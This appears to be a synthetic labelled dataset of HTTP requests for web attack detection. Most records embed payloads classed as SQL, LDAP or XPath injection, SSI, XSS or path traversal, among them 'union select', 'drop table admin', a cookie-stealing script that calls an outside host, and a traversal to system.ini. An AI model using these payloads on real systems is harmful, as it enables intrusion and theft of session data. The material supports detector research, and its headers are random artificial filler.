Accept-Language: u-eizo7;q=0.8, saoEne-eieinuha;q=0.6, to-bk;q=0.7
Cache-Control: no-cache
Client-ip: 12.96.10.110
Cookie: mialStT3ao=ts8MfQnq;5sulvk=uiet;nldw9UyKXIxU=p-a|s9i
Cookie2: $Version="8"
Date: Fri, 14 Apr 06 18:57:41 GMT
ETag: W/"EXe7D19juXkAyKSjQ-nI"
Expect: fzbsii
From: thhe@eis9.be
If-Modified-Since: Fri, 08 Aug 08 15:09:20 CET
If-Unmodified-Since: Mon, 04 Jul 05 05:20:37 GMT
If-Match: *
If-None-Match: "2kHn-LTR3e0e6Vy1-"
If-Range: Sat, 14 Apr 07 01:33:19 CET
Max-Forwards: 6495
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: 2359-0,-77
Referer: /ba4dssdy/waelSko/iphesot/4wwk.swf
TE: deflate,gzip
Trailer: Referer
User-Agent: eAnRXa http://www.lce0Zw.de
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1840x9062
Via: 3.4 106.158.45.224, 4.8 247.178.238.193
Transfer-Encoding: gnnae; dari7yo=NsoIestr
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 835 www.nteiea.shtml "rasrr" "Fri, 06 Jul 07 12:28:32 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49049
Start - Id: 42754
class: SqlInjection
POST /hKXMjn0k4/f@yxMqc9Cy/5W4/meDBq8VrSW7/sV6Qt/9iho/znNYhp4LZ/p_2yfNf2nBZ0/FkAOO3EtmpfcjIG.htm? HTTP/1.1
Content-Length: 71
Content-Language: 35f2de
Content-Encoding: identity
Content-Location: http://dsato.de/oaesR/2Xiuha/eaaDat5.mdb
Content-MD5: ZW55ZXljaWRoZGU5MmFkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 22:02:21 UTC
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: 124.227.78.204
Connection: dyrj
Accept: application/*, image/png, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7
Accept-Language: hamoelAg-a, Sn3e43-ae9;q=0.6, ntinueu-wosn
Cache-Control: max-age=03952
Client-ip: 85.78.89.184
Cookie: hrseasheont=96606;mOt03h0m='   union select @@version,1,1,1--
Cookie2: $Version="585"
Date: Mon, 04 Sep 06 18:30:59 CET
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Sat, 26 May 07 11:38:39 CET
If-Unmodified-Since: Thu, 24 Mar 05 12:40:25 GMT
If-Match: "EgR4IT072wjrI8HGDSE"
If-None-Match: "ZhwwuRxElFCJpbFE"
If-Range: *
Max-Forwards: 6835
MIME-Version: 2.3
Pragma: eorshaob=cmcetbsl
Proxy-Authorization: Digest cnonce="xeouomh"
Authorization: cAisa alsnUi=5ihiat
Referer: /detoon.jpeg
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.3 (Windows; U; WinNT 9.5; gR-ri; rv:2.9.9) Gecko/04704768
UA-CPU: Sparc
UA-Disp: 511,399,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9435x2586
Via: FTP/6.9 236.13.73.17, HTTP/5.2 91.252.12.156:94407
Transfer-Encoding: identity
Upgrade: ot4vpa/8.5
Warning: 200 www.ierlebee.tiff "chcalstx9prp1n0pZc" 
X-Forwarded-For: 65.152.204.230
----: --------------------

thvDtnd9rno=axn7E&lsaL=vedO&O0reoEtihu=pQ2hSklQOv&tOiitLdcvieun6s=o9egi

End - Id: 42754
Start - Id: 37972
class: LdapInjection
GET /EhwnxtviBlndm/46my-/uCuIBfR742_sg4r9FvZ/srorrWteaPlfsitlie7g/33waa8s/oW1O_YtCAdfYknV/uZCC8edmx/ltsidb4/ddrTf4pmAy2.mspx?nmochaPb3access_log3Hd=1&seRwtbhjw08txj=naeHesatyd&n6tasdoea2ai=68827815&y6ris=70dCsd1za+m9s&0Jy8mhomeZc=mhioeUnAhhgllhnhcp&Hnc61=eg%40ajnas%5D%27%40&asU6orTjcCretm=99785&8e31ario8=Ahiscript&ea7oCwnutj=28329&9re6agbTntpyr=71894&osrAuedq=a0rnru9i2m&hDo@q=%27binoi%40%3Bbetween&4eebet=eNset%29%28%26%28objectClass+%3D+9en*%29&Imhge8laeQa=uimgcopyNxd&Figaiqai0x=efsal HTTP/1.1
Host: 83.241.167.145
Connection: Sctt
Accept: */*;q=0.4
Accept-Charset: windows-1254;q=0.5, us-ascii;q=0.3, x-mac-greek;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 212.223.27.223
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="4"
Date: Sun, 23 Sep 07 13:31:28 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Tue, 13 Jan 04 04:26:08 UTC
If-Match: "CE@OyJEi5O-_hV6X"
If-None-Match: *
If-Range: Thu, 23 Jun 05 15:07:54 GMT
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: im4o0 xt8ceo3a=mTmhl
Range: -8,482604-
Referer: /oolK4oar/nfaa.jsp
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: ianw5 (c9dfxdh; nduYl_OE7G; 40SRaw; ecRY2Fnlg)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37972
Start - Id: 41283
class: SqlInjection
GET /pv6p3UyrUsgh.nsf?sr2nhtexd=6602364&dovehtr=sIrd0omoCwhereosfthU0and&ifnng=%3D%5Blz7urcposhutdownnl&etjs=group+byAod3&rtvarrlHRx=htacceshilph1eiQliitbgsoundd HTTP/1.0
Host: www.ostPi1ei.net
Connection: close
Accept: application/*, application/*, image/jpeg
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, deflate;q=0.4, deflate;q=0.1, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: max-age=902
Client-ip: 29.242.226.252
Cookie: tL@ln2=wH21RC4@QavD;1t=aa;hhslaOrsnebelg=3521963949;EAktuhlQ=eftplike;ugrketiehuS='    OR    'es'    LIKE     'aze%25
Cookie2: $Version="585"
Date: Mon, 19 May 08 19:12:22 GMT
ETag: "l5Ba6jUKnSRj0GCD"
Expect: woaieb
If-Modified-Since: Mon, 31 Oct 05 16:09:04 UTC
If-Unmodified-Since: Tue, 13 May 08 19:25:16 GMT
If-Match: "W0r4.NwItXBysp-lr0"
If-None-Match: *
If-Range: Mon, 24 Sep 07 03:39:32 CET
Max-Forwards: 4
Pragma: no-cache
Authorization: Basic aUxkNGpzRWM6eXMwYWk=
Referer: http://httt.de/nrnYshe.asp
TE: gzip,deflate;q=0.9
User-Agent: MaenSmrilcowEessrla
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/0.9 www.435iw.png
Transfer-Encoding: identity
Upgrade: atFtr/4.0, saH/5.1, 2CTc/4.8
Warning: 946 www.ttaflam.js:25381 "lieaaerr1" 

null

End - Id: 41283
Start - Id: 35372
class: SqlInjection
GET /6apnyqet38tghl0ya/ptUn/HRsC/2n3s/loNIm8tooa/brouilaeifnhass6/n2h9a..gif?GVRPcmd=Tvarei+echoh+nl%5Dw+op&Etgi8Lnxv6at=laisix&pH=0&KZ2gnDU3D=%3Caeiwi%28htaccesiframe+dt&etd4ho=%27%3B+++++drop+table+++admin&ph45ihelhd=1h4efe&in0s=25952000&yeooocgqlztr=ecopyN&siugtnmIb8ioon8=hhhs6&ho=zztwonciam9Kae3&ns=ytfs%3Fndelete9sotD HTTP/1.0
Host: www.EblOnetyde.cz
Connection: 5euEi
Accept: image/*;q=0.0
Accept-Charset: windows-874, koi8, iso-8859-2;q=0.9
Accept-Encoding: deflate;q=0.6, compress;q=0.4, gzip
Accept-Language: oin0-d4e42mf
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: otrothhHebn=hkhtg9mnc2r8'i;svmanedd=iwap
Cookie2: $Version="80"
Date: Sat, 10 Sep 05 06:42:33 CET
ETag: "9t_6VgnTeO2lMOGPcbH"
Expect: jetudl=mtent
From: oora@antny.ch
If-Modified-Since: Sun, 12 Apr 09 04:44:32 UTC
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.2
Pragma: kcnMe='dn1fyi9h'
Proxy-Authorization: Digest realm
Authorization: Basic ZTBrbGV0OmFpYTQwc2VT
Range: 187-
Referer: http://evzExpdo.st/dreaxg/9eelWEa/cleta/mo750iEi/tqxi9c.cgi
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.7 (compatible; MSIE 8.6; Win 9x; teogtnbSnt; CKeM)
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: compress
Warning: 951 www.2xdrz.htm "eirrheeitlos31tWp38u" 
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35372
Start - Id: 40660
class: SSI
GET /et.php4?eeaWM=+txml9&10tn0adttioi9oG=udtfHo&gNm2q1h5kNF=eWCim4UkREN&3otnagatAsaEhen=oAhaoo&holar=i%29-&Lorak7xe=%3C%21--%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&e2yenEwfptdpmme=e HTTP/1.0
Host: 9.205.67.255
Connection: do9ivt
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 248.142.217.61
Cookie: aed4spv0=851673;i7ho4zheozn=dLP5;udlSab=nLxGNpNd3;QRBycl@2m=To0tdie
Cookie2: $Version="81"
Date: Thu, 16 Apr 09 23:01:03 UTC
ETag: "ZSKP9aGFodSxvsTRK"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 09 Jan 09 02:28:31 GMT
If-Unmodified-Since: Fri, 10 Sep 04 24:39:59 UTC
If-Match: "JdRWOnDm@sUJL3pYTs"
If-None-Match: "5vRZt@-UWRardWndzh8m"
If-Range: Tue, 18 Mar 08 18:45:07 UTC
Max-Forwards: 2
MIME-Version: 2.6
Pragma: sl=nG
Authorization: Digest response="ed7AEE2Cc42Fe2495bC9F11F516d1caE"
Referer: /yauyqh4s/n0inun/oduj.php3
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.9 (X11; U; Open BSD i586 8.4; oi-aS; rv:3.2.8) Gecko/93464684
UA-CPU: 68000
UA-Disp: 574,0063,16
UA-Color: color32
Via: 0.8 116.106.182.104
Transfer-Encoding: olnood
Upgrade: risQna/2.8, sooR/8.6, loin/4.5, Eydro/8.2, Hdic/5.8
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40660
Start - Id: 48152
class: XSS
GET /1isbvehbtiitimsr5nta/Ratlslts/nJI_XbGdzhuAg.asp?haVel=h+3s6replaceb%5C%3A0r+ofdqov&nsEalRXt87=etdd8hetul&iutsreoanbe5r=s+i&4allKPservicesaG=meamailgoo&alosiaJ47n=xcmourpasswdrexp_&itw=%3C%3Cscript%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.atdeni.com%2Fcgi-bin%2Fteil.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E HTTP/1.1
Host: 1.11.201.51
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: i9aa-eSrh, senEabcr-tan, i-oi;q=0.8, sdoac-iasxS
Cache-Control: no-store
Client-ip: 211.190.214.99
Cookie2: $Version="4"
Date: Fri, 08 Oct 04 24:58:50 CET
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: ri3oektx@agekwucEtP.ch
If-Unmodified-Since: Fri, 30 Nov 07 15:07:44 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 6074
MIME-Version: 8.3
Pragma: Iptahe='erhtjei'
Authorization: do6Us iepi=0stn1
Range: 248-
Referer: /eoiaa/jlliwnes/1ulhnusr/tr2r9.png
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/4.9 (compatible; eschrjMt; Win 9x; heencte; cesdfi4)
UA-Disp: 187,5451,16
UA-Color: color8
Via: HTTP/4.9 243.11.165.161
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
----: ---------------------------------------

null

End - Id: 48152
Start - Id: 46478
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.tiep.ch
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: windows-1255;q=0.7, euc-jp;q=0.1, hz-gb-2312, x-mac-hebrew, iso-8859-3
Accept-Encoding: 
Accept-Language: lo67uo2-id;q=0.8, Imsau-i
Cache-Control: min-fresh=3619
Client-ip: 98.141.212.240
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="355"
Date: Thu, 05 Jun 08 14:24:30 UTC
ETag: "tWOEfGFxp20l3yXR"
Expect: 100-continue
From: oeed@ro5sY.uk
If-Modified-Since: Mon, 15 Dec 08 20:22:02 UTC
If-Unmodified-Since: Wed, 11 Feb 04 24:10:12 GMT
If-Match: *
If-None-Match: "lNV1GwTDFYb7q43rl"
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: tnlL9='2xrctxds'
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: iserFt i8zmg=rspfnme
Range: -540
Referer: /o9aktp/mnmau0t/odaRn6.gif
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 1.7; fe-es; rv:4.9.0) Gecko/90751100
UA-CPU: x86
UA-Disp: 5862,1372,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/1.3 16.151.24.152, FTP/5.2 www.oedi.css, loea/5.6 www.lmuilsea.shtml
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3
Warning: 938 www.atHFrEd.css:45 "szdtn5eo4is" "Sat, 06 Dec 08 18:20:14 CET"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46478
Start - Id: 39139
class: SSI
GET /TxliGVOGMycP/jk3vlk2zKX-Y9LKyjhTh/odnoIeeSxiotitW/5tddsxyore.swf?hh=oqbuN19x&cdBymo6=azdwshaodAn HTTP/1.1
Host: www.ieanben6ia.fr
Connection: keep-alive
Accept: audio/*;q=0.9, audio/*;q=0.8
Accept-Charset: windows-1257, euc-cn
Accept-Encoding: <!--#email fromhost="www.adrs8t4i.com" tohost="mailbox.93un.com" message="adnH eH4ofha ai8lzan oo9eE" fromaddress="dsrLQu.com" toaddress="rcee.hqg0Ae.com" subject="bp" sender="tte.com" replyto="h4ulhs.com" cc="eFrx" inreplyto="at4 cbo bs11eE" id="sftZ2mail" -->
Accept-Language: *
Cache-Control: max-age=617
Client-ip: 19.255.101.192
Cookie: halspltdgPwuy=gfltiitOz6;adhthbolamjaO=7;9usLtd=0bWC9H
Cookie2: $Version="503"
Date: Mon, 08 Mar 10 22:55:16 GMT
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Mon, 26 Jan 04 10:23:27 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 2
Authorization: 4srCbj 2fS0Y=3dxIys
Range: 85-9,-11
Referer: http://8Dmotmw.net/mrom/tumnntd/cnrtpt/catObqo/a0al.mdb
TE: trailers,trailers,deflate;q=0.8
User-Agent: umOK8dtOp http://www.rpph.st
UA-OS: Win98
UA-Color: color16
Via: HTTP/9.5 176.161.237.47, HTTP/7.4 www.Lnnaue0.png, 8.7 www.9tno3r.jpeg
Warning: 601 129.18.108.121 "hesrsMelefcoI" 
X-Forwarded-For: 112.205.75.183

null

End - Id: 39139
Start - Id: 35086
class: SqlInjection
GET /ddWrCxCw_kfQ9H/aZAfWV3UwnR.JbzAKb/aegaootttai3Iarhdac/liKBypbnXVklPom/ouTvasdolcrnh.js?glmniqlls1mhavk=tthomee+e%5C%7E%3Cshp%5Cg%3F&6stbBbdi=ex6taq7tastyleawJ&te4zsS=ItiSPteLiat&ws4co3uXar0aoZ=439613132&hdojusiaem=h72DZ6TuHI&xidpaccept=1Jhw&wUXHY=eshutdown&atykisnqakaaea=hwHhQfmpRCd HTTP/1.0
Host: www.ntbmosmsrd.org:71
Connection: s6diaae
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: ' union     select   @@version,1,1,1--
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Cookie2: $Version="6"
Date: Sat, 30 Dec 06 02:32:45 GMT
ETag: W/"3pNi1-l_5_xe_M5Lf2Xt"
Expect: 100-continue
If-Match: *
If-Range: Thu, 17 Sep 09 22:57:14 UTC
Max-Forwards: 21
Proxy-Authorization: pfnBah teN5eleO=hintM
Referer: http://eaxhdou.cz/eedxt.cfm
User-Agent: zieHgldeo (iaNm_cYNo; igcwNM2q)
Via: 9.9 214.154.140.147, 4.8 237.234.67.104, 7.7 www.tkEsnsrt.tiff:9
Transfer-Encoding: gtzAa1

null

End - Id: 35086
Start - Id: 39248
class: SSI
GET /hSLfPClj73WRW6z/1sithSaaeenonlse/nbjShheafntoc8/chlUQA3dhc/lmeH/rrnt5Lwewecae5ix/sZC0NB_4ULW0lvKOr.mdb?etrhnds51dsa=m1ttse8rwns6o&salteetrltnm=ijn&s3Yhwamq=s4Nyrw&RnerojlsreserHe=Benhfr2ty&mistbtavcTissi=eunehuntelnetw8n++&ZhB43m=uNyLSp&rwyOfn5hpfhAus=hLpP9gdCzH&ithda=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&cose1tEanztlsde=9342&HF9ialacetxunvd=27&7@veWaIMw=rOzRl5w HTTP/1.1
Host: 45.172.59.213
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 213.207.160.227
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="0"
Date: Mon, 30 Aug 04 10:04:12 UTC
ETag: "tuTNCsZDm-eZw0-"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 11 Apr 10 21:38:10 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "JxwGh.45.f9Swmwp"
If-None-Match: "6k9onyt6SyILE@.@3"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 04
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bFN4ZG5mOjZyZVlhZQ==
Authorization: NTLM c250cnlGYWlvdVJaZ0VxdHM4Tm9yZnJ0ZDBoZm9sdGVm
Range: 5-9725,-6683
Referer: /avyf/tdtgvyna/nioodo.tiff
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: ePEdjSex4L http://www.niee8it.it
UA-CPU: MIPS
UA-Disp: 979,109,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: FTP/8.2 69.159.239.55
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39248
Start - Id: 39048
class: LdapInjection
POST /ZBOIv46rchttpLb/iirero9/oR6UCl6CE4vc1Vf/u9/PEDstdinTxchildr/hiQOZAvkwPn/wfps@YNl/ttftpen/rdnesrmabTthni/rN_l.msf? HTTP/1.0
Content-Length: 60
Content-Language: c,t,ussgn
Content-Encoding: identity
Content-Location: http://jertu.fr/tenfl/osur/32ae.txt
Content-MD5: VGdudGRhbG9zemtlMEVuNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 05:32:22 UTC
Last-Modified: Thu, 15 Dec 05 19:34:23 UTC
Host: www.nbEedehsG.org:695
Connection: keep-alive
Accept: text/html, application/x-tar;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: enDsm)(&(objectClass =    Di*)
Accept-Language: *
Cache-Control: oao4NHe=cre5et8a
Cookie: wiieEeazente=dzx8E8G6i;hirhseaaipttAo=nedgnrrmodxhtebe;9497rNc6sae=n-5MFdM;opst2l=>cglo;LWDdBsvrYfu=nuQ52cL
Date: Sat, 23 May 09 07:29:50 UTC
ETag: W/"3cB9HlpJ4rG0odJ"
Expect: lthdpi
From: 3o15uvte@tLwYeep6e.cz
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: "yNzxsuUibc8-Pkge"
If-None-Match: "vfVaWdtScYjFl6jqVaN"
If-Range: "-Gt5NG.BxIijq6uns0HS"
Max-Forwards: 6
MIME-Version: 6.9
Pragma: no-cache
Authorization: NTLM OHJwNnlpOGFpZXNhb2FhbXJldGRzZ3N2ZmlFZGFFbXJyZQ==
Referer: http://eeltrel.de/eQtthNx/ubiin/um34i8/mStdrs.doc
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: 9aR2mul
UA-Pixels: 3109x9976
Via: nut5/4.8 241.253.246.230, smi/0.0 www.ta6s.htm, ist/2.7 15.113.78.236
Transfer-Encoding: compress
Upgrade: Are/6.6, yyhe4a/3.0, 7eytto/3.0, joo2/5.9
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eht7hesw=eaHaotao4ajn&yhisi1site=92&oie=m3v.1iZlzn0&eha4=784

End - Id: 39048
Start - Id: 48657
class: XPathInjection
PUT /ySaWA7vixH/PlmPradminx1Kqkmocha0duT/DKwmHtH1QnullU4oall./aeootblwdtleEosngl7/duoopiijmese/rNS/ht/eeti.css? HTTP/1.0
Content-Length: 248
Content-Language: O2lui,cayshvrw,Us
Content-Encoding: identity
Content-Location: /eselhpE0/lMiae/iydi/Nc1i4/ythrIs.cgi
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Mon, 29 Mar 04 12:24:30 CET
Host: www.tuesif.cz:0
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=4
Client-ip: 125.212.241.80
Cookie: ddntLaee=oSZvb;Agonee4p1twdwta=d'oj;zesdor6d=s1gs
Cookie2: $Version="57"
Date: Fri, 17 Dec 04 11:14:02 UTC
ETag: W/"QyHg7ulSwO5be0D"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: iostchr=S4ii
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: -046912,8351-4,007308-22
Referer: /sfdntyo.jsp
TE: deflate,chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (X11; U; Linux i386 0.3; un-aT; rv:0.6.7) Gecko/51206531
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.0 www.oDoRl.shtml, erXsph/5.5 248.142.165.12, 9.0 65.10.206.200
Transfer-Encoding: deflate
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

IbilaimDt=tcq'  or  count(  path/child::node()[position(    )=((   i +   j    +  k    +l +    1)]  | path/child::*()[position()=(k+1)])=1  or '0siwt'    =   '   En'  or

End - Id: 48657
Start - Id: 49237
class: XPathInjection
GET /a9/8@b0@ScjYQPYlS/rHT9Vu79j/rlTxqN1Z24AJdufh.css?dtnmsNcfhss=kiooh%27%5D++%7C++++P++%7C++++%2F%2Fuser%5B+name%2Ftext%28++%29++++%3D+%27rxn&5ssy=706030&lhrhweajispyeto=7722708 HTTP/1.0
Host: www.eiotiutBo6.biz
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, macintosh, iso-8859-8-i;q=0.3, iso-8859-5, windows-1251;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=98684
Client-ip: 207.163.46.246
Cookie: micaioerygcofn=ur
Cookie2: $Version="6"
Date: Tue, 14 Feb 06 18:02:42 CET
ETag: W/"@I55TFnnWMOE6wgh"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Wed, 09 Nov 05 15:48:41 GMT
If-Unmodified-Since: Wed, 23 Jan 08 11:47:52 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: "EdGH8tIYRZaWjxH"
If-Range: "txHXvv.5IDqckV.oUl"
Max-Forwards: 7534
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM c2ZzZmlnaXRlYXg0dmllbWFtZTFpOWhlOGRycGRFaWRsVGlvZGlycm1ob3M=
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: /sfabUr/bltcoAj/olgniidd.swf
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 1.9; 95-ot; rv:4.2.2) Gecko/02939410
UA-CPU: Sparc
UA-Disp: 2447,4165,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 353x220
Via: 0.2 35.169.79.117, HTTP/3.5 253.74.79.228, 2.0 www.iueozaod.png
Transfer-Encoding: rhlea; amggdiAH=wxoolet8
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 218 61.225.42.189 "r5Iaw8enn" "Mon, 02 Feb 09 06:59:22 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49237
Start - Id: 35980
class: PathTransversal
GET /XDrdn02-U/mK_uVM/mochaNDSx/mm/iJh3V-/lvv.DjzjuD.7YwQs@O1d/jjX5YUbtI9qKTWqNZuE/tYme4gjGbR1xpcKv@Od/goei4ase8n/lOV.4/tSlN/eeel9i.exe?1odu=1748&nhltn=%26buvie%40%5Ciesunionh%3B%24dhttp&1xueso7eLloite=rkpwYwBI&-x0rcpallxp_=mxdd&Onyr=ek%3El%5B-iothievaloqoiti&o0rfpryhhyeh=z-rpE+%3Caofse-Rrue%29%3A&2p=88&WcttfsaeiCnlknT=n1JbC3ivL&holorNi=vbscriptexechlohutq&x3Qb5optSy3zb5=716820659 HTTP/1.1
Host: 16.11.16.152:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.6, x-mac-roman;q=0.5, big5, windows-1251, utf-7
Accept-Encoding: 
Accept-Language: eoIggt-d3, aal2-nea
Cookie: MnodedrgqgxchildNPposition=Donodeimg;0..3EokpLA=winsertmSihOyNn;zees=sa@.Eqy;OlbwapEsTa=..\..\..\..\..\..\WINNT\system.ini;tosctrsDIaitn=ei2bsglotvsma
Cookie2: $Version="251"
Date: Wed, 17 Mar 10 19:27:36 CET
If-Range: "B@9drR5ph_ruLNB"
Max-Forwards: 4
Referer: /de8n/enoorl/epgot49/nmOh8tA.htm
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 3.7; hR-de; rv:6.2.0) Gecko/66937712
Warning: 569 www.w4qw3W.tiff "a1hmieojzPrutdhemsu" "Wed, 24 Jun 09 20:01:41 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35980
Start - Id: 48623
class: XPathInjection
